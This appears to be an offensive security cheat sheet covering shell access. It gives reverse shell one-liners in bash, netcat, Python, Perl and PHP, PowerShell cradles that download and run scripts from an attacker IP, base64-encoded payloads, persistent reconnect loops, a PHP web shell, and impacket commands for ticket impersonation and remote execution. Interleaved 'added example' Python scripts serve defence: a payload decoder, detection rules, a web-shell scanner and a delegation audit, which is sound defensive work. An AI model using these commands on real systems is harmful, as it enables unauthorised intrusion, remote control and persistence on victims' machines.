Shell & Stabilization

Reverse Shell

Linux

#Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'

#netcat
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 443 >/tmp/f

#php 
#(with proc_open & proc_close - shell.phar)
<?php

$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);

$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], "nc 127.0.0.1 9001");
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);

$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>


#python injection input
__import__('os').system('whoami')

#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

Windows

#Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File shell.ps1


#Execute file remotely
IEX (New-Object System.Net.WebClient).DownloadString('http://<attacker ip>/shell.ps1')


# Invoke-PowershellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1

# 1. setup python http server
# 2. execute

powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1')
#or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1

# encode payload

cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0

powershell -enc <encode payload>
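The iconv/base64 transform above is easy to reverse for triage. The following Python script is an added example, not part of the original page: it pulls the -enc argument out of a process command line, decodes it (base64, then UTF-16LE) and flags the download-cradle keywords used in the commands on this page. The sample command line is constructed here; 192.0.2.10 is a documentation address.

```python
import base64
import re
from typing import Optional

# Download-cradle keywords used in the commands on this page (matched case-insensitively).
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
              "iwr", "Invoke-WebRequest", "-ExecutionPolicy Bypass", "-ep bypass")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common spellings are covered.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Same transform as `iconv -t utf-16le | base64 -w 0`; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
        return None


def triage(cmdline: str) -> dict:
    """Decode if needed, then list which cradle indicators the effective script contains."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = [i for i in INDICATORS if i.lower() in text.lower()]
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits}


# Constructed sample: the download cradle from this page, encoded the same way as above.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/Invoke-PowerShellTcp.ps1')"
SAMPLE_CMDLINE = "powershell -enc " + encode_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```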

# Execute command without crashing the previous shell
# 1. pwn.ps1

Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe

# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri <attacker ip>/pwn.ps1 -usebasicparsing)"

# note: change the payload in pwn.ps1 if it doesn't work.

Shell Stabilization (Linux)

When?

$ tty
not a tty

Note:

[Ctrl + C] only works if the machine has bash as the default shell.

Use "clear" instead.

python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'

Keyboard shortcut: [Ctrl + Z] (background the process)

stty raw -echo ; fg ; reset
stty columns 200 rows 200

Persistence Reverse Shell

It is important to start a persistent shell before executing anything else.

Linux

while :; do setsid bash -i &>/dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done &>/dev/null &


nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &

Windows

nc.exe must be uploaded to the target first.

start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
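Added example, not from the original page: a small rule set that flags the reverse-shell one-liners from the Reverse Shell section and the reconnect loops from this section when they show up in process command-line logs (auditd EXECVE records, Sysmon Event ID 1 and Windows 4688 all carry the command line). The sample command lines are constructed; 192.0.2.10 is a documentation address.

```python
import re

# Rules for the reverse-shell one-liners and reconnect loops on this page, applied to a
# process command line. Each entry is (rule name, compiled regex).
RULES = [
    ("bash_dev_tcp",       re.compile(r"/dev/tcp/\S+")),
    ("netcat_exec",        re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd\.exe)")),
    ("mkfifo_pipe_shell",  re.compile(r"mkfifo\s+\S+.*\|\s*nc\b")),
    ("python_pty_spawn",   re.compile(r"pty\.spawn\(")),
    ("python_dup2_socket", re.compile(r"os\.dup2\(.*\.fileno\(\)")),
    ("perl_socket_exec",   re.compile(r"use Socket;.*exec\(")),
    ("setsid_detach",      re.compile(r"\bsetsid\b.*bash -i")),
    # persistence section: a loop, then a connect-back, then a delay (sleep N / ping -n N)
    ("persistence_loop",   re.compile(
        r"(?:while\s*:|for /L).*?(?:/dev/tcp/|\bnc(?:\.exe)?\b).*?(?:sleep|ping -n)\s+\d+")),
]


def scan(cmdlines):
    """Return [(line_no, [matching rule names])] for command lines that hit at least one rule."""
    findings = []
    for n, line in enumerate(cmdlines, 1):
        hits = [name for name, rx in RULES if rx.search(line)]
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample command lines with benign ones mixed in.
SAMPLE_CMDLINES = [
    "ls -la /tmp",
    "bash -c 'bash -i >& /dev/tcp/192.0.2.10/443 0>&1'",
    "nc -zv 192.0.2.10 22",
    "nc 192.0.2.10 4444 -e /bin/bash",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 443 >/tmp/f",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "while :; do setsid bash -i &>/dev/tcp/192.0.2.10/4444 0>&1; sleep 60; done",
    'cmd /C "for /L %n in (1,0,10) do ( nc.exe 192.0.2.10 4444 -e cmd.exe & ping -n 60 127.0.0.1 )"',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_CMDLINES):
        print(f"line {n}: {', '.join(hits)}")
```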

Web Shell

PHP

cmd --> shell.php

<?php
echo system($_REQUEST['cmd']);
?>

$URL/shell.php?cmd=id

Note: the simplest way to send commands is Burp Suite Repeater.

Change the GET request to a POST request for easier input handling.
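Added example, not from the original page: a scanner that walks a web root for PHP files in which request input (like the $_REQUEST['cmd'] above) reaches an exec-style function, which is how a dropped shell.php surfaces in a triage sweep. The sample web root is created in a temporary directory from constructed files.

```python
import os
import re
import tempfile

EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
REQUEST = r"\$_(?:GET|POST|REQUEST|COOKIE)"
# request input passed straight into an exec-style call, e.g. system($_REQUEST['cmd'])
DIRECT = re.compile(EXEC_FUNCS + r"[^;]*" + REQUEST, re.IGNORECASE)
# two-step variant: $c = $_POST['c']; ... passthru($c);
ASSIGN = re.compile(r"(\$\w+)\s*=\s*" + REQUEST)

def scan_php_source(src: str) -> list:
    """Findings for one PHP source text: direct hits plus tainted variables reaching exec calls."""
    hits = [m.group(0) for m in DIRECT.finditer(src)]
    for var in sorted({m.group(1) for m in ASSIGN.finditer(src)}):
        if re.search(EXEC_FUNCS + r"[^;]*" + re.escape(var) + r"\b", src, re.IGNORECASE):
            hits.append(f"{var} carries request input into an exec-style call")
    return hits

def scan_webroot(root: str) -> dict:
    """Map relative path -> findings for every PHP-like file under root that has any."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".phar")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def build_sample_webroot() -> str:
    """Constructed web root: the shell.php from this page, a benign page and a two-step shell."""
    root = tempfile.mkdtemp()
    samples = {
        "shell.php": "<?php\necho system($_REQUEST['cmd']);\n?>\n",
        "index.php": "<?php\necho htmlspecialchars($_GET['q']);\n?>\n",
        os.path.join("uploads", "x.phtml"): "<?php\n$c = $_POST['c'];\npassthru($c);\n?>\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    print(scan_webroot(build_sample_webroot()))
```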

IIS

Dig deeper

https://github.com/tennc/webshell

Windows NT Authority shell from Administrator

psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe

Shell to another user in Active Directory

Note: PowerShell

Convert credentials

$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential "<username>", $pw

Command

Invoke-Command -ComputerName 127.0.0.1 -Credential $creds -ScriptBlock { whoami }

After logging in, run PowerView.

Shell with silver ticket

If the domain user has constrained delegation privileges, you can use the -impersonate flag to request a ticket on behalf of another user.

For example:

# example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator

Request ticket

# username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123


# NTLM Hash
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <ntlm hash>:<ntlm hash>

Save ticket to env

export KRB5CCNAME=Administrator.ccache

Login with ticket

impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
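From the defender's side, the precondition for this is an account with msDS-AllowedToDelegateTo set and a privileged target that is neither marked "Account is sensitive and cannot be delegated" (userAccountControl bit 0x100000) nor a member of Protected Users. The following Python audit is an added example, not from this page or from Impacket: it expects account records exported from LDAP (constructed inline here, reusing the names from the examples above) and reports delegating accounts plus privileged users that can still be impersonated.

```python
# userAccountControl bit for "Account is sensitive and cannot be delegated".
NOT_DELEGATED = 0x100000
PROTECTED_USERS_RDN = "CN=Protected Users"


def can_be_delegated(acct: dict) -> bool:
    """True when neither the NOT_DELEGATED flag nor Protected Users membership shields the account."""
    if acct.get("userAccountControl", 0) & NOT_DELEGATED:
        return False
    return not any(dn.startswith(PROTECTED_USERS_RDN) for dn in acct.get("memberOf", []))


def audit_delegation(accounts: list, privileged: set) -> dict:
    """Report accounts allowed constrained delegation and privileged accounts still impersonable.

    accounts: LDAP-style records with sAMAccountName, userAccountControl,
              msDS-AllowedToDelegateTo (list of SPNs) and memberOf (list of DNs).
    """
    delegating = {a["sAMAccountName"]: a["msDS-AllowedToDelegateTo"]
                  for a in accounts if a.get("msDS-AllowedToDelegateTo")}
    exposed = sorted(a["sAMAccountName"] for a in accounts
                     if a["sAMAccountName"] in privileged and can_be_delegated(a))
    return {"delegating": delegating, "exposed_privileged": exposed}


# Constructed sample records; names reuse the example env above, values are made up.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_int$", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["www/server01.test.local"], "memberOf": []},
    {"sAMAccountName": "john", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": [], "memberOf": []},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": [], "memberOf": ["CN=Domain Admins,CN=Users,DC=test,DC=local"]},
    {"sAMAccountName": "backupadmin", "userAccountControl": 0x200 | NOT_DELEGATED,
     "msDS-AllowedToDelegateTo": [], "memberOf": ["CN=Domain Admins,CN=Users,DC=test,DC=local"]},
]
PRIVILEGED = {"Administrator", "backupadmin"}

if __name__ == "__main__":
    report = audit_delegation(SAMPLE_ACCOUNTS, PRIVILEGED)
    for name, spns in report["delegating"].items():
        print(f"{name} may delegate to {', '.join(spns)}")
    print("privileged accounts that can still be impersonated:", report["exposed_privileged"])
```

Fixing the exposed accounts means setting the NOT_DELEGATED flag or adding them to Protected Users, and reviewing whether each delegating account still needs its msDS-AllowedToDelegateTo entries.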

Login using Impacket (need local admin creds)

These need valid credentials; if one command fails, try the next one.

# test with crackmapexec smb

impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP

# wmi port
impacket-wmiexec <domain>/<username>@$IP

# test with crackmapexec winrm
evil-winrm 
